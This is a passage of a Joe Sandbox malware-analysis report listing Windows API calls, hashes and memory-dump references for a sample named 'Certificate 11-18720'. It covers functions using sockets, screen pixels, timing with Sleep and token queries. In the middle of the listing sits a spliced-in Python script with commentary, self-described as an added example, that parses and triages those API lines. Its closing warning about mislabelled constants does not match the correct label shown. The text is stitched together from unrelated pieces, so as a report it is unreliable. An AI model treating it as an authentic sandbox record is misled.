                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$__itow
                                                                                    • String ID:
                                                                                    • API String ID: 3379773720-0
                                                                                    • Opcode ID: 3172b5ec9b98d0f0bf4c2fca7b7cc3bd39b89c098e4a35bf601803bc9c07cf81
                                                                                    • Instruction ID: d8e6a4b3db5bb4fea1dccd78ecce4d6c26db5bbca29b654c3649a7ee6cf8f1a6
                                                                                    • Opcode Fuzzy Hash: 3172b5ec9b98d0f0bf4c2fca7b7cc3bd39b89c098e4a35bf601803bc9c07cf81
                                                                                    • Instruction Fuzzy Hash: 9D21C97570020DFAEB10AAA5CC4AFEF7E69BF99710F011025FB45EB181EB748D4587A2
                                                                                    APIs
                                                                                      • Part of subcall function 005C50E6: _wcsncpy.LIBCMT ref: 005C50FA
                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,?,006060C3), ref: 00606369
                                                                                    • GetLastError.KERNEL32(?,?,?,006060C3), ref: 00606374
                                                                                    • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006060C3), ref: 00606388
                                                                                    • _wcsrchr.LIBCMT ref: 006063AA
                                                                                      • Part of subcall function 00606318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,006060C3), ref: 006063E0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
                                                                                    • String ID:
                                                                                    • API String ID: 3633006590-0
                                                                                    • Opcode ID: cb73b8f1f7a2487cad6b5f66be51f311cae01490ad34020d76ce3c8acd7917c8
                                                                                    • Instruction ID: ae9c32f662a8add5f36ae9e44041d2275b62ff5922e5f603cf86a50d8dc47dbc
                                                                                    • Opcode Fuzzy Hash: cb73b8f1f7a2487cad6b5f66be51f311cae01490ad34020d76ce3c8acd7917c8
                                                                                    • Instruction Fuzzy Hash: E721DB319842155ADB2DAB78EC56FEB235EFF06390F102466F145D72C0EFA0D99186A4
                                                                                    APIs
                                                                                      • Part of subcall function 0061A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0061A84E
                                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00618BD3
                                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 00618BE2
                                                                                    • connect.WSOCK32(00000000,?,00000010), ref: 00618BFE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorLastconnectinet_addrsocket
                                                                                    • String ID:
                                                                                    • API String ID: 3701255441-0
                                                                                    • Opcode ID: 60fec44186c6afec39731dc012939d872bf141c78214beb6d1fc5b441138f9be
                                                                                    • Instruction ID: abea57fdaf8a32b84b6dbe44dd52bea874d447787570e0dae615121271404149
                                                                                    • Opcode Fuzzy Hash: 60fec44186c6afec39731dc012939d872bf141c78214beb6d1fc5b441138f9be
                                                                                    • Instruction Fuzzy Hash: DB21C3356001159FCB10EF68CD49FBE77AAAF45720F04445DF906973D2CB70AC418B51
                                                                                    APIs
                                                                                    • IsWindow.USER32(00000000), ref: 00618441
                                                                                    • GetForegroundWindow.USER32 ref: 00618458
                                                                                    • GetDC.USER32(00000000), ref: 00618494
                                                                                    • GetPixel.GDI32(00000000,?,00000003), ref: 006184A0
                                                                                    • ReleaseDC.USER32(00000000,00000003), ref: 006184DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ForegroundPixelRelease
                                                                                    • String ID:
                                                                                    • API String ID: 4156661090-0
                                                                                    • Opcode ID: 9edf044c2fa4dd0db3f635b169e7444698da41d359db4adaef137e83648dffaa
                                                                                    • Instruction ID: dee34340f7582e65edc22c93ece9858b109bc4660ceb12ca60bc17e8d653869d
                                                                                    • Opcode Fuzzy Hash: 9edf044c2fa4dd0db3f635b169e7444698da41d359db4adaef137e83648dffaa
                                                                                    • Instruction Fuzzy Hash: AB216F7AA00205AFD714DFA4DC89AAEBBF6EF49301F04C479E85997351DA70AC40CB60
                                                                                    APIs
                                                                                    • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 005DAFE3
                                                                                    • SelectObject.GDI32(?,00000000), ref: 005DAFF2
                                                                                    • BeginPath.GDI32(?), ref: 005DB009
                                                                                    • SelectObject.GDI32(?,00000000), ref: 005DB033
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: ObjectSelect$BeginCreatePath
                                                                                    • String ID:
                                                                                    • API String ID: 3225163088-0
                                                                                    • Opcode ID: b925320e032026988248f6125be59fc2581c4b0d879e67cf8266c404f62ee02e
                                                                                    • Instruction ID: 14d463e3b89e7f61fc6c929d1aa3b9c4b4589528cf72f5fa012517132afb3053
                                                                                    • Opcode Fuzzy Hash: b925320e032026988248f6125be59fc2581c4b0d879e67cf8266c404f62ee02e
                                                                                    • Instruction Fuzzy Hash: 2521A174800205FFEB21DF59EC4879A7B6FBB12395F24531BE4609A2A0E3714992CB90
                                                                                    APIs
                                                                                    • __calloc_crt.LIBCMT ref: 005E21A9
                                                                                    • CreateThread.KERNEL32(?,?,005E22DF,00000000,?,?), ref: 005E21ED
                                                                                    • GetLastError.KERNEL32 ref: 005E21F7
                                                                                    • _free.LIBCMT ref: 005E2200
                                                                                    • __dosmaperr.LIBCMT ref: 005E220B
                                                                                      • Part of subcall function 005E7C0E: __getptd_noexit.LIBCMT ref: 005E7C0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                    • String ID:
                                                                                    • API String ID: 2664167353-0
                                                                                    • Opcode ID: 90b49e3a95e3c5c905b40fbc9926d4ab7990f3a40c082b986fe965c7e2e655ce
                                                                                    • Instruction ID: f2d8c3813465ebbeaca6d853979a6f67fe953224a9ecb4f0cff36937a7858778
                                                                                    • Opcode Fuzzy Hash: 90b49e3a95e3c5c905b40fbc9926d4ab7990f3a40c082b986fe965c7e2e655ce
                                                                                    • Instruction Fuzzy Hash: D711E5361047CB6FDB19AF679C45D6F3F9DFF45760B100429FA9486185EB31880186A0
                                                                                    APIs
                                                                                    • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 005FABD7
                                                                                    • GetLastError.KERNEL32(?,005FA69F,?,?,?), ref: 005FABE1
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,005FA69F,?,?,?), ref: 005FABF0
                                                                                    • HeapAlloc.KERNEL32(00000000,?,005FA69F,?,?,?), ref: 005FABF7
                                                                                    • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 005FAC0E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 842720411-0
                                                                                    • Opcode ID: 773426db96c338dbd358d3491c68b88d7cd45b605eaea4238bf44ee04fc23483
                                                                                    • Instruction ID: 3cb492a8196ee24d86942d0dfce55c8825c484d00087e0fe42eb4fc97dfbee40
                                                                                    • Opcode Fuzzy Hash: 773426db96c338dbd358d3491c68b88d7cd45b605eaea4238bf44ee04fc23483
                                                                                    • Instruction Fuzzy Hash: 46013CB5600208BFDB114FA9DC48DAB3FAEFF8A755B101469F949C3260DA71DC40CB61
                                                                                    APIs
                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00607A74
                                                                                    • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00607A82
                                                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00607A8A
                                                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00607A94
                                                                                    • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00607AD0
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                    • String ID:
                                                                                    • API String ID: 2833360925-0
                                                                                    • Opcode ID: 5706a01a5970a471278fbd79474d42ee26faa17fb3482f695a00dab7e78a389f
                                                                                    • Instruction ID: 0cd6f471e2ee2f3248ff61a1374ee65c53a0f28e76824c52e0a31a2258b430de
                                                                                    • Opcode Fuzzy Hash: 5706a01a5970a471278fbd79474d42ee26faa17fb3482f695a00dab7e78a389f
                                                                                    • Instruction Fuzzy Hash: B2014C75E44619EBCF08EFE4DC48ADEBB7AFF09711F000495E902B2290DB30AA5487A5
                                                                                    APIs
                                                                                    • CLSIDFromProgID.OLE32 ref: 005F9ADC
                                                                                    • ProgIDFromCLSID.OLE32(?,00000000), ref: 005F9AF7
                                                                                    • lstrcmpiW.KERNEL32(?,00000000), ref: 005F9B05
                                                                                    • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 005F9B15
                                                                                    • CLSIDFromString.OLE32(?,?), ref: 005F9B21
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 3897988419-0
                                                                                    • Opcode ID: 61ec2c78e6ddf34a80edc4951287ee9b245b50503dba341d89f0722dd76c4627
                                                                                    • Instruction ID: a19261103153d82e9ad6b1fd4b86ed98ab1c2a54b40377cd99a503f91c250b81
                                                                                    • Opcode Fuzzy Hash: 61ec2c78e6ddf34a80edc4951287ee9b245b50503dba341d89f0722dd76c4627
                                                                                    • Instruction Fuzzy Hash: 0C018B7AA00619BFDB114F68EC44BBEBEEEEB85352F148024FA05D2210D778DD409BA0
                                                                                    APIs
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 005FAA79
                                                                                    • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 005FAA83
                                                                                    • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 005FAA92
                                                                                    • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 005FAA99
                                                                                    • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 005FAAAF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: ddfdb1457ada7f62f95c04c00bb8473863fa5c5efb421d611a3a7b148d288b36
                                                                                    • Instruction ID: f4bcdaf91a6000be8c972fd337f9d73e334951e08911f57e1f4b048013105296
                                                                                    • Opcode Fuzzy Hash: ddfdb1457ada7f62f95c04c00bb8473863fa5c5efb421d611a3a7b148d288b36
                                                                                    • Instruction Fuzzy Hash: 70F04F796002187FEB115FA4AC89E7B3FADFF4A794F001419FA45C7190DA649C45CA62
                                                                                    APIs
                                                                                     • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 005FAADA
                                                                                     • GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 005FAAE4
                                                                                     • GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 005FAAF3
                                                                                     • HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 005FAAFA
                                                                                     • GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 005FAB10
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                     • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmp
                                                                                     • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                    • String ID:
                                                                                    • API String ID: 44706859-0
                                                                                    • Opcode ID: a64025631f91e289057d3131122d0e552f58da52ef096e645b2ff7744fe03dc9
                                                                                    • Instruction ID: ae47b9f27c86a98416c7aad72fc109f074128fa58c42f600b38c150294a0bf93
                                                                                    • Opcode Fuzzy Hash: a64025631f91e289057d3131122d0e552f58da52ef096e645b2ff7744fe03dc9
                                                                                    • Instruction Fuzzy Hash: 45F04F757002087FEB111FA4EC88E7B3B6EFF46754F001029FA45C7190CA6498018A62
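The function listings above (the WSOCK32 socket/connect block, the GetPixel block with its argument-less GetForegroundWindow entry, the QueryPerformanceCounter/Sleep block and the GetTokenInformation block) all use one line format, which makes them easy to triage in bulk. The following Python is an added example, not code from the Joe Sandbox report or its IDA plugin: it parses lines of the form `Name.Module(args), ref: ADDR`, groups them per function, and decodes the Win32 constants (address family, socket type, protocol, TOKEN_INFORMATION_CLASS) from their hex values rather than from any parenthetical label the plugin attaches. The sample input is constructed from the listing's own lines with the plugin's labels removed; the `---` block separator and the rule set are this example's own conventions.

```python
"""Triage helper for per-function API listings in a Joe Sandbox IDA-plugin dump.

Added example, not part of the Joe Sandbox report. Lines look like
'Name.Module(args), ref: ADDR', optionally prefixed 'Part of subcall function X:';
arguments are 8-digit hex values or '?', sometimes followed by a '(Label)'.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: API lines of four function blocks from the listing above, plugin
# labels removed. The '---' separator between blocks is this script's own convention.
SAMPLE = """
• Part of subcall function 0061A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0061A84E
• socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00618BD3
• WSAGetLastError.WSOCK32(00000000), ref: 00618BE2
• connect.WSOCK32(00000000,?,00000010), ref: 00618BFE
---
• IsWindow.USER32(00000000), ref: 00618441
• GetForegroundWindow.USER32 ref: 00618458
• GetDC.USER32(00000000), ref: 00618494
• GetPixel.GDI32(00000000,?,00000003), ref: 006184A0
• ReleaseDC.USER32(00000000,00000003), ref: 006184DB
---
• QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00607A74
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00607A82
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00607A8A
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00607A94
• Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00607AD0
---
• GetTokenInformation.ADVAPI32(?,00000003,?,00000000,?), ref: 005FAADA
• GetTokenInformation.ADVAPI32(?,00000003,00000000,?,?,?,00000003,?,00000000,?), ref: 005FAB10
"""

LINE_RE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Win32 constants the rules decode (values as defined in the Windows SDK headers).
TOKEN_INFORMATION_CLASS = {1: "TokenUser", 2: "TokenGroups", 3: "TokenPrivileges",
                           4: "TokenOwner", 20: "TokenElevation", 25: "TokenIntegrityLevel"}
ADDRESS_FAMILY = {2: "AF_INET", 23: "AF_INET6"}
SOCKET_TYPE = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTOCOL = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str
    subcall_of: Optional[str] = None


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one listing line; None for lines that are not API entries."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = m.group("args")
    # Plugin labels contain no commas in this dump, so a plain split suffices (assumption).
    arg_list = [a.strip() for a in args.split(",")] if args is not None else []
    return ApiCall(m.group("name"), m.group("module"), arg_list, m.group("ref"), m.group("sub"))


def parse_blocks(text: str) -> List[List[ApiCall]]:
    """Split the dump into per-function blocks separated by '---' lines."""
    blocks, current = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "---":
            if current:
                blocks.append(current)
            current = []
        elif line:
            call = parse_api_line(line)
            if call:
                current.append(call)
    if current:
        blocks.append(current)
    return blocks


def arg_value(arg: str) -> Optional[int]:
    """Integer value of an 8-digit hex argument; None for '?' or non-numeric text.
    A trailing '(Label)' attached by the plugin is ignored: the value is authoritative."""
    m = re.match(r"^([0-9A-Fa-f]{8})(?:\(.*\))?$", arg.strip())
    return int(m.group(1), 16) if m else None


def triage(block: List[ApiCall]) -> List[str]:
    """Findings for one function: timing measurement, raw socket use, token queries."""
    findings: List[str] = []
    names = [c.name for c in block]
    # Two QueryPerformanceCounter reads bracketing a Sleep: the function measures elapsed time.
    qpc = [i for i, n in enumerate(names) if n == "QueryPerformanceCounter"]
    if len(qpc) >= 2 and any(qpc[0] < i < qpc[-1] for i, n in enumerate(names) if n == "Sleep"):
        findings.append("timing check: QueryPerformanceCounter brackets Sleep")
    for c in block:
        if c.name == "socket" and len(c.args) >= 3:
            fam, typ, proto = (arg_value(a) for a in c.args[:3])
            desc = (f"socket({ADDRESS_FAMILY.get(fam, fam)}, {SOCKET_TYPE.get(typ, typ)}, "
                    f"{PROTOCOL.get(proto, proto)})")
            if "connect" in names:
                desc += " followed by connect"
            findings.append(desc)
        elif c.name == "GetTokenInformation" and len(c.args) >= 2:
            cls = arg_value(c.args[1])  # second parameter is TokenInformationClass
            desc = f"GetTokenInformation class {cls} = {TOKEN_INFORMATION_CLASS.get(cls, 'unknown')}"
            if desc not in findings:
                findings.append(desc)
    return findings


if __name__ == "__main__":
    for block in parse_blocks(SAMPLE):
        print(f"function block at ref {block[0].ref}:")
        for finding in triage(block) or ["no rule matched"]:
            print("   ", finding)
```

Run it directly to print the findings per block; in practice the same parser feeds whatever rule set you maintain. Decoding from the numeric value rather than the label matters because labels can be wrong: in TOKEN_INFORMATION_CLASS the value 3 is TokenPrivileges, while TokenIntegrityLevel is 25.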
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 005FEC94
                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 005FECAB
                                                                                    • MessageBeep.USER32(00000000), ref: 005FECC3
                                                                                    • KillTimer.USER32(?,0000040A), ref: 005FECDF
                                                                                    • EndDialog.USER32(?,00000001), ref: 005FECF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                    • String ID:
                                                                                    • API String ID: 3741023627-0
                                                                                    • Opcode ID: 52c59a5598bf1f3ea9fca66e94f9fa1cddecc854d675215aa99bb6e197c7e3cb
                                                                                    • Instruction ID: c3e0a98e63900d8bf4e0c15070c0cf8e7f970791fb94a223967b3d5d41a3e568
                                                                                    • Opcode Fuzzy Hash: 52c59a5598bf1f3ea9fca66e94f9fa1cddecc854d675215aa99bb6e197c7e3cb
                                                                                    • Instruction Fuzzy Hash: 1101D134900758ABEB24AF10DE4FBA67BB9FB01705F00055DB682A14E0DBF4AE44CB50
                                                                                    APIs
                                                                                    • EndPath.GDI32(?), ref: 005DB0BA
                                                                                    • StrokeAndFillPath.GDI32(?,?,0063E680,00000000,?,?,?), ref: 005DB0D6
                                                                                    • SelectObject.GDI32(?,00000000), ref: 005DB0E9
                                                                                    • DeleteObject.GDI32 ref: 005DB0FC
                                                                                    • StrokePath.GDI32(?), ref: 005DB117
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1703473779.00000000005C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005C0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1703456521.00000000005C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000064D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703544457.000000000066E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703589433.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1703619244.0000000000684000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5c0000_Certificate 11-18720.jbxd
                                                                                    Similarity
                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                    • String ID:
                                                                                    • API String ID: 2625713937-0
                                                                                    • Opcode ID: 706ed3d2a81b6b12814959849cbda3aa1c553b3e64b7a85daa25dba812a3fa21
                                                                                    • Instruction ID: 9fb1ed4844f4c32aeb412a8e8e78e9d612f173601c51c5a15495d54e230ff735
                                                                                    • Opcode Fuzzy Hash: 706ed3d2a81b6b12814959849cbda3aa1c553b3e64b7a85daa25dba812a3fa21
                                                                                    • Instruction Fuzzy Hash: 1BF01938000244EFEB219F69EC0C7543F6BBB027A2F28A316E4A5491F0D7318AA6CF10
                                                                                    APIs
                                                                                    • CoInitialize.OLE32(00000000), ref: 0060F2DA
